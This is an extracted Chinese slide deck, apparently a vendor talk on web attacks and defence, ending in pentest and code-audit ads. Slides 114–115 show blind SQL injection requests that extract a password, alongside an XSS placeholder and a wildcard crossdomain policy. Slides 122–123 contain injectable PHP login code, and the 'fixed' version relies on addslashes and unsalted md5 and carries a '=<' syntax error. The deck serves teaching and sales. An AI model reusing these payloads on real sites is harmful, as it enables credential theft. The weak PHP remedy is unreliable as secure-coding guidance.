    • 106. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
    • 107. Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd
    • 108. Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 : aa 密 码 : aa_passwd 登陆成功,欢迎 aa…
    • 109. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
    • 110. C lient Web Server Client Arp 病毒 登陆论坛 用户名 : aa 密 码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 : aa 密 码 : aa_passwd
    • 111. Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
    • 112. 入侵技术交流 防御 访问控制缺陷
    • 113. Get /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
    • 114. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
    • 115. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 4. 寻找后台登陆页面 Attacker Web Server FALSE TRUE FALSE
    • 116. 入侵技术交流 防御 WEB2.0 时代
    • 117. 用户客户端 WEB 服务端 数据库 HTML+CSS HTTP REQ Ajax WEB 或者 XML 服务端 数据库 XML HTTP REQ 浏览器 服务端 用户客户端 HTML+CSS JavaScript 浏览器 服务端
        •  Web 1.0
        •  Web 2.0
    • 118. <cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
    • 119. 攻 防
    • 120. register_globals magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
    • 121. 绿盟科技专业服务 代码审计服务 渗透测试服务
    • 122. <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, $username, $password); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, $username, $password); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?>
        •  代码审计服务
      绿盟科技安全小组使用白盒 (White Box) 测试对源代码进行审计,找出编程缺陷,并提供改进建议及最佳安全编码实践。
    • 123. <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?>
        •  代码审计服务
    • 124. Pentest Pentest Pentest … 绿盟科技渗透测试小组 (NSFOCUS Pen-test Team) 使用多种技术和方法对客户授权指定的设备进行模拟攻击,验证当前的安全防护措施,找出风险点,提供有价值的安全建议。
        •  渗透测试服务
      Pen-test Team Web Server Succeed Succeed Succeed
    • 125.
        • 此广告位 招租
        • 请联系 68730606-8502
        • 按出价高低顺序约谈…
    • 126.  
    • 127. Professional Security Solution Provider Thanks!